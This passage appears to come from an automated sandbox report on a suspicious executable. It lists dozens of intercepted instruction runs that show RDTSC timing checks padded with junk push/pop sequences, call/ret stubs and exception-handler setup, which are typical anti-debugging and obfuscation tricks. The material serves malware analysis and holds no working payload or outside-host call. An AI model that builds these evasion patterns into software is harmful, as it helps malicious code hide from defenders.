Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5802B6 second address: 5802BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5802BC second address: 5802C6 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC69CB9B4A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5B8FBC second address: 5B8FC8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5B8FC8 second address: 5B8FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5B8FCE second address: 5B8FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5B8FD2 second address: 5B8FD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5B8FD6 second address: 5B8FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe - RDTSC instruction interceptor: First address: 5B9290 second address: 5B92BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 je 00007FC69CB9B4A6h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FC69CB9B4B6h 0x00000014 popad 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B92BD second address: 5B92C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B92C1 second address: 5B92D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B92D6 second address: 5B92F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC69CE9FC68h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B972A second address: 5B9739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FC69CB9B4A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B9739 second address: 5B973D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B973D second address: 5B9741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5B9741 second address: 5B9747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BCFF1 second address: 5BCFF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BD1BD second address: 5BD1C7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BD1C7 second address: 5BD1D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC69CB9B4A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BD58A second address: 5BD58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BDA97 second address: 5BDABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FC69CB9B4A6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebx 0x00000011 mov dword ptr [ebp+122D29D1h], esi 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC69CB9B4AEh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BDC78 second address: 5BDC7E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BDC7E second address: 5BDC85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BDE21 second address: 5BDE25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BDFCE second address: 5BDFD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BE05E second address: 5BE070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC69CE9FC5Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C0606 second address: 5C060A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C1399 second address: 5C13AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FC69CE9FC5Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C10A7 second address: 5C10AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C13AF second address: 5C13B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C13B4 second address: 5C13B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C350E second address: 5C351B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C48A6 second address: 5C48AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C3D09 second address: 5C3D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C45F3 second address: 5C4605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4AEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C48AA second address: 5C48B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C4605 second address: 5C4609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C48B4 second address: 5C4937 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FC69CE9FC58h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 call 00007FC69CE9FC5Ah 0x00000027 jmp 00007FC69CE9FC5Fh 0x0000002c pop esi 0x0000002d or dword ptr [ebp+122D1ED4h], edx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 pushad 0x00000038 pushad 0x00000039 mov eax, 0E362597h 0x0000003e jmp 00007FC69CE9FC64h 0x00000043 popad 0x00000044 jmp 00007FC69CE9FC5Eh 0x00000049 popad 0x0000004a xchg eax, ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C4937 second address: 5C493B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C493B second address: 5C4941 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C6534 second address: 5C6542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jo 00007FC69CB9B4A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C756D second address: 5C7572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C9539 second address: 5C9544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FC69CB9B4A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C7572 second address: 5C7578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5C766A second address: 5C7673 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CACA8 second address: 5CAD40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FC69CE9FC5Bh 0x0000000c nop 0x0000000d sub dword ptr [ebp+122D1D9Ah], eax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FC69CE9FC58h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov di, 1014h 0x00000038 mov bl, 6Dh 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 adc di, 6897h 0x00000046 mov edi, 6C2BDC45h 0x0000004b mov eax, dword ptr [ebp+122D07FDh] 0x00000051 mov bl, al 0x00000053 push FFFFFFFFh 0x00000055 call 00007FC69CE9FC63h 0x0000005a sub edi, dword ptr [ebp+122D2F5Dh] 0x00000060 pop ebx 0x00000061 sub edi, dword ptr [ebp+122D1DC6h] 0x00000067 push eax 0x00000068 je 00007FC69CE9FC6Eh 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FC69CE9FC60h 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CCB53 second address: 5CCBD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007FC69CB9B4ACh 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e jmp 00007FC69CB9B4ABh 0x00000013 pop ebx 0x00000014 nop 0x00000015 mov edi, dword ptr [ebp+122D2198h] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007FC69CB9B4A8h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 movzx edi, ax 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FC69CB9B4A8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Ah 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 mov bx, ax 0x00000059 xchg eax, esi 0x0000005a push eax 0x0000005b push edx 0x0000005c jns 00007FC69CB9B4ACh 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CBBB9 second address: 5CBBC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CCDC1 second address: 5CCDD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jc 00007FC69CB9B4A6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CCDD4 second address: 5CCDDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CDE46 second address: 5CDE4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CEB2B second address: 5CEBBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC69CE9FC5Ah 0x0000000f nop 0x00000010 push esi 0x00000011 mov edi, 1D4841EFh 0x00000016 pop edi 0x00000017 mov ebx, dword ptr [ebp+122D32CEh] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007FC69CE9FC58h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007FC69CE9FC58h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 0000001Dh 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 jbe 00007FC69CE9FC5Ch 0x0000005b or dword ptr [ebp+122D1C9Eh], edi 0x00000061 push eax 0x00000062 pushad 0x00000063 pushad 0x00000064 jp 00007FC69CE9FC56h 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CEBBD second address: 5CEBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC69CB9B4B2h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CDE4A second address: 5CDE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CDE54 second address: 5CDE65 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC69CB9B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CDE65 second address: 5CDE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CFCAE second address: 5CFCC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CED13 second address: 5CED2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CED2B second address: 5CEDE5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC69CB9B4B8h 0x00000008 jmp 00007FC69CB9B4B2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov ebx, dword ptr [ebp+122D37A5h] 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007FC69CB9B4A8h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 mov edi, dword ptr [ebp+122D217Dh] 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 pushad 0x00000045 stc 0x00000046 push ebx 0x00000047 jl 00007FC69CB9B4A6h 0x0000004d pop esi 0x0000004e popad 0x0000004f mov eax, dword ptr [ebp+122D0C35h] 0x00000055 movsx edi, ax 0x00000058 push FFFFFFFFh 0x0000005a push 00000000h 0x0000005c push edi 0x0000005d call 00007FC69CB9B4A8h 0x00000062 pop edi 0x00000063 mov dword ptr [esp+04h], edi 0x00000067 add dword ptr [esp+04h], 0000001Ch 0x0000006f inc edi 0x00000070 push edi 0x00000071 ret 0x00000072 pop edi 0x00000073 ret 0x00000074 push eax 0x00000075 pushad 0x00000076 jmp 00007FC69CB9B4B5h 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007FC69CB9B4B0h 0x00000082 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D0C33 second address: 5D0CAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FC69CE9FC58h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 pushad 0x00000027 jl 00007FC69CE9FC58h 0x0000002d pushad 0x0000002e popad 0x0000002f cld 0x00000030 popad 0x00000031 push 00000000h 0x00000033 mov ebx, dword ptr [ebp+122D1DBFh] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007FC69CE9FC58h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 jmp 00007FC69CE9FC5Ah 0x0000005a push eax 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D0CAC second address: 5D0CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D1CA3 second address: 5D1CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D1CA8 second address: 5D1CAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D1CAE second address: 5D1CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 585353 second address: 58535D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC69CB9B4A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58535D second address: 58536D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jno 00007FC69CE9FC56h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CFEB9 second address: 5CFEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D52AF second address: 5D52B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D1FA0 second address: 5D1FD3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC69CB9B4BDh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jng 00007FC69CB9B4A8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FC69CB9B4A6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D70F1 second address: 5D7120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC69CE9FC62h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jmp 00007FC69CE9FC62h 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D7120 second address: 5D7126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D7126 second address: 5D716F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FC69CE9FC58h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov edi, 757E11E4h 0x0000002c push 00000000h 0x0000002e sbb bh, FFFFFFD6h 0x00000031 push 00000000h 0x00000033 xor edi, 70B1410Dh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pop edx 0x0000003f pop eax 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D72F5 second address: 5D72FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D72FB second address: 5D7390 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov bl, 43h 0x0000000b push dword ptr fs:[00000000h] 0x00000012 mov edi, dword ptr [ebp+124574ABh] 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f mov edi, 0A8BB338h 0x00000024 mov eax, dword ptr [ebp+122D1389h] 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FC69CE9FC58h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 mov edi, dword ptr [ebp+122D30E1h] 0x0000004a mov bx, A2A6h 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push edi 0x00000053 call 00007FC69CE9FC58h 0x00000058 pop edi 0x00000059 mov dword ptr [esp+04h], edi 0x0000005d add dword ptr [esp+04h], 00000015h 0x00000065 inc edi 0x00000066 push edi 0x00000067 ret 0x00000068 pop edi 0x00000069 ret 0x0000006a jmp 00007FC69CE9FC5Ah 0x0000006f push eax 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 